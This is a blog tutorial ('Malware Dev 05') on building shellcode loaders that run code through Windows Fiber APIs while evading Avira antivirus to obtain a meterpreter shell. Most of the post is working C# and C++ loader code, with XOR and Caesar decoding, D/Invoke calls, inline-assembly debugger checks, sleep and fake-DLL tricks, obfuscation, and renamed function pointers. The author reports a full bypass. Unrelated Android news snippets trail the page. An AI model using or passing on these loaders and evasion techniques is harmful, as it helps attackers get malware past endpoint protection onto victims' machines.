Malware Dev 05 - 免杀之 Shellcode Execution Through Fiber
创始人
2024-06-02 23:31:20
0

写在最前

如果你是信息安全爱好者,如果你想考一些证书来提升自己的能力,那么欢迎大家来我的 Discord 频道 Northern Bay。邀请链接在这里:

https://discord.gg/9XvvuFq9Wb

我会提供备考过程中尽可能多的帮助,并分享学习和实践过程中的资源和心得,大家一起进步,一起 NB~


Background

Defense evasion is of course the ongoing cat and mouse game that’s never going to end. Today, we are going to introduce one trick in this game to evade the “cat” using one of Microsoft’s feature called Fiber.

We are going to introduce the basic concept of Fiber first, then we are going to test a C# version and C++ version of the shellcode runner, on the newest version of Avira (Evading Windows Defender is trivial, refer to my previous article for details - Windows Defender 绕过(RTO I Lab环境实测)).

Without further ado, let’s dive in.

Get to Know Fiber

Fiber, according to Microsoft, is a kind of “light weight” thread that can be manually scheduled and function outside of system scheduler. Think of Fiber as a scheduled task based on thread. You can create it, and then fire it whenever you are ready.

To use a Fiber to execute any shellcode, you basically only have to call four Win32 APIs, namely:

  1. VirtualAlloc
  2. ConvertThreadToFiber
  3. CreateFiber
  4. SwitchToFiber

And that’s it. Your shellcode will run as intended.

Compare to the infamous CreateThread, WaitForSingleObject combination, Fiber should at least draw a bit less attention of those “cats”.

Next, we are going to utilize Fiber in our shellcode runner, and try our best to evade Avira’s detection and get a meterpreter shell on the target system.

Testing Environment

Refer to the below images.

在这里插入图片描述

With Avira antivirus updated to the latest version. Real protection is on, and heuristic detection is on as well.

在这里插入图片描述

Evading Avira

Next, I’m going to use C# first, to try to evade Avira and get a meterpreter shell. And, after that, I’m going to switch to C++, and try the same. Then, I’m going to run a summary about the things I’ve done.

C# Evasion

C# Evasion with P/Invoke

Vanilla Fiber execution of shellcodes, not a single evasion technique is applied.

using System;
using System.Runtime.InteropServices;public class FiberExecutePInvoke
{// cipher offsetstatic readonly int OFFSET = 9;static void Main(string[] args){byte[] buf = new byte[510] { /* Caeser Ciphered shellcode here */ };for (int i = 0; i < buf.Length; i++){Buf[i] = (byte)(((uint)buf[i] - OFFSET) & 0xFF);}IntPtr Shellcode = Win32.VirtualAlloc(IntPtr.Zero, (UInt32)buf.Length, 0x3000, 0x40);Marshal.Copy(buf, 0, Shellcode , Buf.Length);IntPtr CurFiber = Win32.ConvertThreadToFiber();IntPtr NewFiber = Win32.CreateFiber(0, Shellcode , 0);Win32.SwitchToFiber(NewFiber );}
}class Win32
{[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);[DllImport("kernel32.dll")]public static extern IntPtr ConvertThreadToFiber();[DllImport("kernel32.dll")]public static extern IntPtr CreateFiber(uint dwStackSize, IntPtr lpStartAddress, uint lpParameter);[DllImport("kernel32.dll")]public extern static IntPtr SwitchToFiber(IntPtr fiberAddress);
}

Gets detected right away after downloading.

在这里插入图片描述

在这里插入图片描述

Next, let’s determine if it’s our shellcode that has been deemed as AGEN.1208634. I left only one byte of shellcode there and compiled it again.

在这里插入图片描述

Detected.

在这里插入图片描述

Still as AGEN.1208634, so it’s not shellcode bytes. There’re lots of other possibilities like argument names or functions calls.

在这里插入图片描述

Let’s keep digging and add some non-standard APIs, like VirtualAllocExNuma, but still got detected.

在这里插入图片描述

在这里插入图片描述

At this point, I have to determine if it’s the Fiber API calls, or P/Invoke itself which is getting caught.

So, I comment out fiber API first. Leave only VirtualAlloc.

在这里插入图片描述

And it’s still detected. It’s more of a P/Invoke thing now.

在这里插入图片描述

在这里插入图片描述

So, I comment out all P/Invoke codes and the DllImport statements.

Surprisingly, the payload survived.

At this point, I have confirmed that Avira is hunting for P/Invoke. Let’s switch to D/Invoke.

C# Evasion with D/Invoke

Program.cs

using System;
using System.Runtime.InteropServices;
using DInvoke.DynamicInvoke;namespace FiberExecuteDInvoke
{internal class Program{[UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = true)]delegate IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = true)]delegate IntPtr ConvertThreadToFiber();[UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = true)]delegate IntPtr CreateFiber(uint dwStackSize, IntPtr lpStartAddress, uint lpParameter);[UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = true)]delegate IntPtr SwitchToFiber(IntPtr fiberAddress);[UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = true)]delegate void Sleep(uint dwMilliseconds);[UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = true)]delegate IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);[UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = true)]delegate IntPtr GetCurrentProcess();static void Main(string[] args){var AddrVirtualAlloc = Generic.GetLibraryAddress("kernel32.dll", "VirtualAlloc");var AddrConvToFiber = Generic.GetLibraryAddress("kernel32.dll", "ConvertThreadToFiber");var AddrCreateFiber = Generic.GetLibraryAddress("kernel32.dll", "CreateFiber");var AddrSwitchToFiber = Generic.GetLibraryAddress("kernel32.dll", "SwitchToFiber");var AddrSleep = Generic.GetLibraryAddress("kernel32.dll", "Sleep");var AddrGetCurProc = Generic.GetLibraryAddress("kernel32.dll", "GetCurrentProcess");var FuncVirtualAlloc = (VirtualAlloc)Marshal.GetDelegateForFunctionPointer(AddrVirtualAlloc, typeof(VirtualAlloc));var FuncConvToFiber = (ConvertThreadToFiber)Marshal.GetDelegateForFunctionPointer(AddrVirtualAlloc, typeof(ConvertThreadToFiber));var FuncCreateFiber = (CreateFiber)Marshal.GetDelegateForFunctionPointer(AddrVirtualAlloc, typeof(CreateFiber));var FuncSwitchToFiber = (SwitchToFiber)Marshal.GetDelegateForFunctionPointer(AddrVirtualAlloc, typeof(SwitchToFiber));var FuncSleep = (Sleep)Marshal.GetDelegateForFunctionPointer(AddrVirtualAlloc, typeof(Sleep));var FuncGetCurProc = (GetCurrentProcess)Marshal.GetDelegateForFunctionPointer(AddrVirtualAlloc, typeof(GetCurrentProcess));byte[] Buf = new byte[] { /* XORed shellcode here */ };Buf = FiberDecoder.Decoder.DecodeXOR(Buf);IntPtr CodeBuf = FuncVirtualAlloc(IntPtr.Zero, (UInt32)Buf.Length, 0x3000, 0x40);Marshal.Copy(Buf, 0, CodeBuf, Buf.Length);IntPtr CurFiber = FuncConvToFiber();IntPtr NewFiber = FuncCreateFiber(0, CodeBuf, 0);FuncSwitchToFiber(NewFiber);}}
}

Decoder.cs

namespace FiberDecoder
{internal class Decoder{// xor keystatic readonly byte[] KEY = { 0x0a, 0x19, 0x4f, 0x7d, 0xce, 0x13, 0xdd, 0xab };public static byte[] DecodeXOR(byte[] Buf){int BufLen = Buf.Length;int KeyLen = KEY.Length;byte[] Decoded = new byte[BufLen];for (int i = 0; i < BufLen; i++){Decoded[i] = (byte)((uint)Buf[i] ^ KEY[i % KeyLen]);}return Decoded;}

D/Invoke hammers P/Invoke by just vanilla code. It’s not detected when writing the file to disk (via download).

So, I tried to execute it.

Then it gets caught.

在这里插入图片描述

Detected as APC. Looks like shellcode is safe already.

在这里插入图片描述

As before, adding time delay is still detected.

在这里插入图片描述

Adding non-standard API is not working either.

在这里插入图片描述

Since it’s APC, I guess it may be the function and parameter names that’s got caught. Let’s try use Codeception to obfuscate the project and try.

That’s it.

Codeception obfuscated payload evades heuristic detection.

在这里插入图片描述

And I got a meterpreter shell. Game over.

在这里插入图片描述

Next, let’s try using C++.

C++ Evasion

C++ Evasion with Vanilla Shellcode Runner

C++ might enable us more options. Let’s see how it behaves against Avira.

I’ll start with a version that’s not using Fiber at all and see if it will be caught by Avira’s real protection.

#include const char KEY[] = "\x0a\x19\x4f\x7d\xce\x13\xdd\xab";int main()
{unsigned char buf[] = " XORed shellcode here";for (int i = 0; i < sizeof(buf); i++) {buf[i] = buf[i] ^ KEY[i % sizeof KEY];}void* exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_READWRITE);memcpy(exec, buf, sizeof buf);DWORD oldProtect;VirtualProtect(exec, sizeof(buf), PAGE_EXECUTE_READ, &oldProtect);((void(*)())exec)();
}

This code just survives after downloading. Interesting.

在这里插入图片描述

Let’s manually scan it.

Detected. That’s more like it.

在这里插入图片描述

C++ Evasion with Fiber

Let’s first switch to Fiber.

#include const char KEY[] = "\x0a\x19\x4f\x7d\xce\x13\xdd\xab";int main()
{void* cur_f;void* new_f;unsigned char buf[] = " XORed shellcode here";for (int i = 0; i < sizeof(buf); i++) {buf[i] = buf[i] ^ KEY[i % sizeof KEY];}void* exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_READWRITE);memcpy(exec, buf, sizeof buf);cur_f = ConvertThreadToFiber(0);new_f = CreateFiber(0, (LPFIBER_START_ROUTINE)exec, 0);DWORD oldProtect;VirtualProtect(exec, sizeof(buf), PAGE_EXECUTE_READ, &oldProtect);SwitchToFiber(new_f);return 0;
}

Compile the code and it survives signature detection too. Let’s manually scan it.

Detected as something else.

在这里插入图片描述

C++ Evasion with Inline Assembly to Check Debugger Presence

In each process’s PEB, we can find this BeingDebugged property. This property is like a flag, it will be set by the operating system on a process if the process is being debugged by a user-land debugger. Here, it is Avira.

Let’s take a look inside Notepad process’s PEB.

We can see at _PEB+0x02, we have this BeingDebugged property.

在这里插入图片描述

And this offset stays the same in x86 process as well. Next is the property of Notepad++ x86 process.

在这里插入图片描述

We can see that the flag is set to 0x1, which means Notepad++ is being debugged.

And I have to point out that the PEB structure is at the offset 0x30 to TEB (Thread Environment Block).

在这里插入图片描述

And one more thing, the FS register points right at the beginning of TEB.

So, we can find BeingDebugged by referring to [FS:0x30].

I have to use inline assembly, so I have to switch my build architecture to x86, otherwise the code won’t build.

Add the following code into the main function.

__asm
{
check_debugger:PUSH EAXMOV EAX, FS:[0x30]MOV EAX, [EAX+0x02]TEST EAX, EAXJNZ check_debugger  // if it's being debugged, loop itPOP EAX
}

Compile it and drop it on target and manually scan it.

在这里插入图片描述

Still being detected. But now, it shows APC once again as previously with C# code.

So it’s the function calls again, because the loop is skipped and Avira tests the next instructions and flagged other function calls as APC malicious code.

C++ Evasion Trying Other Ticks

Add Time Delay

I added the following code to delay the process. And Avira should skip this Sleep function.

	int Tic = GetTickCount();Sleep(5000);int Tac = GetTickCount();if ((Tac - Tic) < 3000) {return false;}

Still gets caught.

在这里插入图片描述

Load Fake DLL

bool bypass()
{HINSTANCE hDll = LoadLibrary(L"notexist.dll");if (hDll != NULL){bypass(argv);}
}

Still gets detected.

It seems Avira removes all return statements from the main function. It will no matter what simulate the code after the return point.

It’s time to think of obfuscating the function names.

So, what I think is that, if I detect that my program is being debugged, I will issue a jump to the end of my program, no return statement.

 __asm{check_debugger:PUSH EAXMOV EAX, FS:[0x30]MOV EAX, [EAX+0x02]TEST EAX, EAXJNZ HERE  // if it's being debugged, jump to end of main functionPOP EAX}/* other statements here in main */__asm{Here:POP EAX}return 0;

在这里插入图片描述

Put this program into IDA, and we can see the label HERE at the end, and the program will jump to it, if BeingDebugged flag is set, the program just terminates.

在这里插入图片描述

在这里插入图片描述

Let’s try this out.

Still, detected.

在这里插入图片描述

Tough moment with C++.

C++ Evasion with Custom Function

I defined my own functions, with very naive names. Then I resolve the functions at runtime. And call my custom function instead of standard APIs.

...
typedef LPVOID(WINAPI* BANANA)(LPVOID cat, SIZE_T cow, DWORD zebra, DWORD squeek);
typedef LPVOID(WINAPI* BOAT)(LPVOID bike);
typedef LPVOID(WINAPI* PHONE)(SIZE_T bucket, LPFIBER_START_ROUTINE number, LPVOID snake);
typedef LPVOID(WINAPI* DOOR)(LPVOID bakery, SIZE_T cow, DWORD mouse, PDWORD dog);
typedef LPVOID(WINAPI* FLY)(LPVOID head);
...int main()
{BANANA MyBanana = (BANANA)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "VirtualAlloc");BOAT MyBoat = (BOAT)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "ConvertThreadToFiber");PHONE MyPhone = (PHONE)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "CreateFiber");DOOR MyDoor = (DOOR)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "VirtualProtect");FLY MyFly = (FLY)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "SwitchToFiber");
}

Clear. Game over.

在这里插入图片描述

Final Thoughts

In this article, we go through the process of evading Avira using C# and C++, utilizing Fiber to execute our shellcode. We can see that normal tricks like time delay, and non-standard APIs won’t work against Avira. We have to find other ways to evade detection.

And for C#, P/Invoke is simply not good enough. So, we switch to D/Invoke instead. And with code obfuscation techniques (using Codeception), we finally passed all the detections in Avira.

For C++, first step is to check if the our program is under debugging. If so, we simply loop the code and that gave us a little progress which rendered our payload a malicious APC, but not something AGENT like. Next, we adopted the same methodology as obfuscation, and declared our own typedef functions, to avoid calling Win32 APIs like VirtualAlloc, ConvertThreadToFiber, etc, directly. That, finally got us a clear pass through Avira’s detection.

Of course, other things should be taking into consideration too. Like using HeapAlloc instead of VirtualAlloc. Allocate memory as RW, then use VirtualProtect to flip the bits to RX, instead of allocate it as RWX directly. These may lower your detection rate a bit as well.

Next, we are going against Kaspersky, and see what it holds for us.

References

  • https://learn.microsoft.com/en-us/windows/win32/procthread/using-fibers?source=recommendations
  • https://learn.microsoft.com/en-us/windows/win32/api/fibersapi/nf-fibersapi-flsalloc
  • https://learn.microsoft.com/en-us/windows/win32/procthread/thread-local-storage
  • https://cocomelonc.github.io/tutorial/2021/11/28/malware-injection-8.html
  • https://www.bordergate.co.uk/shellcode-execution-via-fibers/
  • https://github.com/FULLSHADE/Jektor
  • https://github.com/Kara-4search/Fiber_ShellcodeExecution/tree/main/Fiber_ShellcodeExecution
  • http://dronesec.pw/blog/2019/08/12/code-execution-via-fiber-local-storage/
  • https://tishina.in/execution/nim-fibers
  • https://www.cybermongol.ca/our-journey.html
  • https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates
  • https://github.com/Accenture/Codecepticon#read-this-first
  • https://umbrella.cisco.com/blog/using-entropy-to-spot-the-malware-hiding-in-plain-sight
  • https://mohamed-fakroud.gitbook.io/red-teamings-dojo/windows-internals/peb
  • https://rvsec0n.wordpress.com/2019/09/13/routines-utilizing-tebs-and-pebs/
  • https://pentest.blog/art-of-anti-detection-1-introduction-to-av-detection-techniques/
  • https://stackoverflow.com/questions/37288289/how-to-get-the-process-environment-block-peb-address-using-assembler-x64-os
  • https://pentest.blog/art-of-anti-detection-2-pe-backdoor-manufacturing/
  • https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-convertthreadtofiber
  • https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfiber
  • https://social.msdn.microsoft.com/Forums/vstudio/en-US/157d2c24-eb4b-4a35-a2c4-32cb3f24d568/lpvoid-vs-pvoid?forum=vcgeneral
  • https://learn.microsoft.com/en-us/windows/win32/api/winbase/nc-winbase-pfiber_start_routine

相关内容

热门资讯

模拟安卓系统软件,软件功能与体... 你有没有想过,手机里的世界可以变得更加丰富多彩?没错,就是那种可以像安卓系统一样自由自在地玩耍的世界...
安卓换系统会卡吗,换系统会卡吗... 你有没有想过,你的安卓手机用久了,是不是也会像人一样,反应变得迟钝了呢?没错,这就是我们今天要探讨的...
平板安卓系统自动重启,安卓平板... 你是不是也遇到过这种情况?平板电脑突然间就自动重启了,是不是瞬间感觉心里一紧,心想这可怎么办呢?别急...
findx3安卓系统,安卓系统... 你有没有发现,最近手机圈里又掀起了一股热潮?没错,就是OPPO Find X3系列的安卓系统。这款系...
安卓系统删除的软件,那些曾陪伴... 手机里的软件越来越多,是不是有时候觉得内存不够用,想清理一下呢?别急,今天就来聊聊安卓系统删除软件的...
白色的手机安卓系统,安卓系统下... 你有没有发现,最近市面上那些白色的手机简直让人眼前一亮呢?尤其是搭载安卓系统的那些,简直就像是一块块...
vico是不是安卓系统,揭秘安... 最近是不是有很多小伙伴在问:“Vico手机,它是不是运行安卓系统呢?”这个问题可真是让人好奇啊!今天...
安卓10系统省电不,安卓10系... 你有没有发现,自从升级到安卓10系统,手机续航能力好像大不如前了?别急,今天就来给你揭秘安卓10系统...
cm14安卓系统,深度定制与极... 你有没有发现,你的安卓手机最近是不是有点不一样了?是不是觉得系统运行得更加流畅,界面也更加美观了呢?...
平板安卓系统咋样升级,轻松实现... 你那平板安卓系统是不是有点儿卡,想给它来个升级大变身?别急,让我来给你详细说说平板安卓系统咋样升级,...
安卓原系统在哪下载,探索纯净体... 你有没有想过,为什么安卓手机那么受欢迎?那是因为它的系统——安卓原系统,它就像是一个充满活力的魔法师...
安卓系统procreate绘图... 你有没有发现,现在手机上画画变得越来越流行了?尤其是用安卓系统的手机,搭配上那个神奇的Procrea...
电视的安卓系统吗,探索安卓电视... 你有没有想过,家里的电视是不是也在悄悄地使用安卓系统呢?没错,就是那个我们手机上常用的安卓系统。今天...
苹果手机系统操作安卓,苹果iO... 你有没有发现,身边的朋友换手机的时候,总是对苹果和安卓两大阵营争论不休?今天,咱们就来聊聊这个话题,...
安卓系统换成苹果键盘,键盘切换... 你知道吗?最近我在想,要是把安卓系统的手机换成苹果的键盘,那会是怎样的体验呢?想象那是不是就像是在安...
小米操作系统跟安卓系统,深度解... 亲爱的读者们,你是否曾在手机上看到过“小米操作系统”和“安卓系统”这两个词,然后好奇它们之间有什么区...
miui算是安卓系统吗,深度定... 亲爱的读者,你是否曾在手机上看到过“MIUI”这个词,然后好奇地问自己:“这玩意儿是安卓系统吗?”今...
安卓系统开机启动应用,打造个性... 你有没有发现,每次打开安卓手机,那些应用就像小精灵一样,迫不及待地跳出来和你打招呼?没错,这就是安卓...
小米搭载安卓11系统,畅享智能... 你知道吗?最近小米的新机子可是火得一塌糊涂,而且听说它搭载了安卓11系统,这可真是让人眼前一亮呢!想...
安卓2.35系统软件,功能升级... 你知道吗?最近在安卓系统界,有个小家伙引起了不小的关注,它就是安卓2.35系统软件。这可不是什么新玩...